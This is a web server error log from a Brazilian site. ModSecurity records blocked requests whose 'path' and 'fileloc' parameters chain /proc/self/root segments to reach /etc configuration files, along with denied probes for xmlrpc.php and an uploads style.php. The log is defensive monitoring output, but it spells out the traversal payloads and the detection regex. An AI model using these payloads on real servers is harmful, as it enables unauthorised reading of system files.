[tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abukk8df6f5d65gmYZQ-hQAAAss"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:24:14.621442 2026] [:error] [pid 27293:tid 140411641214720] [client 74.7.241.31:48200] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuknv-YZRR_7pZ7nDJYoQAAA8w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:24:19.251136 2026] [:error] [pid 27293:tid 140411607643904] [client 74.7.241.31:54072] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuko_-YZRR_7pZ7nDJYpwAAA9A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:24:22.979476 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.241.31:33512] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abukpta6ubjKNq_cu4YMMwAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:24:26.826735 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.228.61:52448] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abukqeyqAr6etmhZHNovJwAAAEE"]
[Thu Mar 19 04:25:32.771575 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.243.128:57382] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuk7OoXxyEfFpUF8f_cTQAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:27:04.512551 2026] [access_compat:error] [pid 19093:tid 140411548894976] [client 103.245.17.222:60428] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Thu Mar 19 04:27:19.308457 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.241.31:36712] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abulVwkwaGbbGflqUZCAMwAAAMw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:27:21.850057 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.241.31:46702] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abulWda6ubjKNq_cu4YMzQAAA1c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:27:26.372748 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.241.31:46706] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abulXsdf6f5d65gmYZQ_AgAAAsc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:27:27.701944 2026] [:error] [pid 27293:tid 140411632822016] [client 74.7.241.31:43116] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abulX_-YZRR_7pZ7nDJZEQAAA80"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:27:33.639210 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.241.31:43132] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abulZda6ubjKNq_cu4YM4AAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:27:36.032954 2026] [:error] [pid 27293:tid 140411548894976] [client 74.7.241.31:43140] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abulaP-YZRR_7pZ7nDJZGgAAA9c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:27:42.299033 2026] [:error] [pid 27403:tid 140411716749056] [client 74.7.241.31:39600] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abulbhkFeYa1D6dYQnC5dgAAAcM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:27:46.162050 2026] [:error] [pid 19093:tid 140411699963648] [client 74.7.241.31:39610] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abulb1_V7PWP6ixUYl6IBQAAAoU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:27:47.930824 2026] [:error] [pid 27293:tid 140411582465792] [client 74.7.241.31:51838] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abulc_-YZRR_7pZ7nDJZKAAAA9M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:29:50.798642 2026] [access_compat:error] [pid 15826:tid 140411607643904] [client 38.127.61.169:39210] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-content/uploads/style.php
[Thu Mar 19 04:29:55.069211 2026] [access_compat:error] [pid 19093:tid 140411641214720] [client 38.127.61.169:39286] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-content/uploads/style.php
[Thu Mar 19 04:30:00.365072 2026] [access_compat:error] [pid 26799:tid 140411649607424] [client 38.127.61.169:39488] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-content/uploads/style.php
[Thu Mar 19 04:30:06.035832 2026] [access_compat:error] [pid 31803:tid 140411565680384] [client 38.127.61.169:39476] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-content/uploads/style.php
[Thu Mar 19 04:30:17.007060 2026] [:error] [pid 27293:tid 140411624429312] [client 74.7.241.31:56646] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abumCf-YZRR_7pZ7nDJZhAAAA84"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:30:19.728837 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.241.31:53506] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abumC_u8EFLIOrSqIptp6wAAAko"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:32:11.931340 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.244.43:45438] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abume_u8EFLIOrSqIptqSAAAAlc"]
[Thu Mar 19 04:32:28.992420 2026] [:error] [pid 19093:tid 140411574073088] [client 74.7.241.31:32938] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abumjF_V7PWP6ixUYl6I2wAAApQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:32:30.892746 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.243.128:33690] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abumjta6ubjKNq_cu4YN_wAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:32:31.355036 2026] [:error] [pid 27293:tid 140411641214720] [client 74.7.241.31:51960] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abumj_-YZRR_7pZ7nDJZxwAAA8w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:32:32.203932 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.243.128:60770] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sudo.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abumkAkwaGbbGflqUZCBPgAAAMc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:32:33.535121 2026] [:error] [pid 31803:tid 140411691570944] [client 74.7.243.128:60774] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/networks"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abumkeyqAr6etmhZHNowiQAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
